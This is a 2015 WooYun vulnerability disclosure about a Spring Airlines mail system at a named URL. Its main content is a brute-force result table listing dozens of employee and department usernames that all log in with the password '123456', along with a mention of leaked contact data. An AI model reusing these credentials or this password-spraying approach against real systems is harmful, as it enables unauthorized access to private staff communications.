当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141838

漏洞标题:航空安全之春秋航空某系统账户系统控制不严(泄漏内部通讯信息)

相关厂商:春秋航空

漏洞作者: harbour_bin

提交时间:2015-09-17 23:35

修复时间:2015-11-05 09:26

公开时间:2015-11-05 09:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

RT

详细说明:

1、URL:

http://mail.china-sss.com:3000/


2、用户名+密码进行爆破, 存在大量弱口令, 证明可以登录

Request	Payload1	Payload2	Status	Error	Timeout	Length	Comment
18 hkt_zhengtingting 123456 200 false false 36533
66 changxiaona_hotel 123456 200 false false 36533
15 hkt_zhanggaowei 123456 200 false false 36529
17 hkt_zhangyanyue 123456 200 false false 36529
64 changchunspring 123456 200 false false 36529
8 hkt_dailinling 123456 200 false false 36527
10 hkt_hulongjiao 123456 200 false false 36527
16 hkt_zhangjieli 123456 200 false false 36527
7 hkt_changtian 123456 200 false false 36525
9 hkt_hahaiting 123456 200 false false 36525
13 hkt_xiaoyulin 123456 200 false false 36525
20 hyhou 123456 200 false false 36525
21 jiangjiacheng 123456 200 false false 36525
40 travel-online 123456 200 false false 36525
73 chengduspring 123456 200 false false 36525
98 guizhouspring 123456 200 false false 36525
11 hkt_sunjiayi 123456 200 false false 36523
27 qianjingying 123456 200 false false 36523
62 B2Cservice01 123456 200 false false 36523
14 hkt_yaofang 123456 200 false false 36521
28 qiaoyongjun 123456 200 false false 36521
42 wangyinchen 123456 200 false false 36521
47 zhangjunjun 123456 200 false false 36521
71 xingzhengke 123456 200 false false 36521
92 kangun_0830 123456 200 false false 36521
12 hkt_wanglu 123456 200 false false 36519
19 htk_wanglu 123456 200 false false 36519
69 2253945367 123456 200 false false 36519
90 maximilian 123456 200 false false 36519
3 caotianle 123456 200 false false 36517
22 jixiangwu 123456 200 false false 36517
23 kimxiao79 123456 200 false false 36517
26 muzhenyou 123456 200 false false 36517
53 zhiganghn 123456 200 false false 36517
55 aikohuang 123456 200 false false 36517
70 f1.alice 123456 200 false false 36515
87 geshasha 123456 200 false false 36515
88 traveljp 123456 200 false false 36515
89 event.gy 123456 200 false false 36515
102 jackyhan 123456 200 false false 36515
109 grace.hu 123456 200 false false 36515
2 baoyuyu 123456 200 false false 36513
32 shenlan 123456 200 false false 36513
68 europe9 123456 200 false false 36513
41 usvisa 123456 200 false false 36511
49 zhaolp 123456 200 false false 36511
67 utbsky 123456 200 false false 36511
86 beibei 123456 200 false false 36511
30 rain 123456 200 false false 36507


3、通讯录和敏感信息等

QQ截图20150917211636.jpg


QQ截图20150917211557.jpg


可以进一步爆破, 深入

漏洞证明:

已证明!

修复方案:

你们更专业!

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-21 09:25

厂商回复:

谢谢,已收到。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-18 08:20 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    mark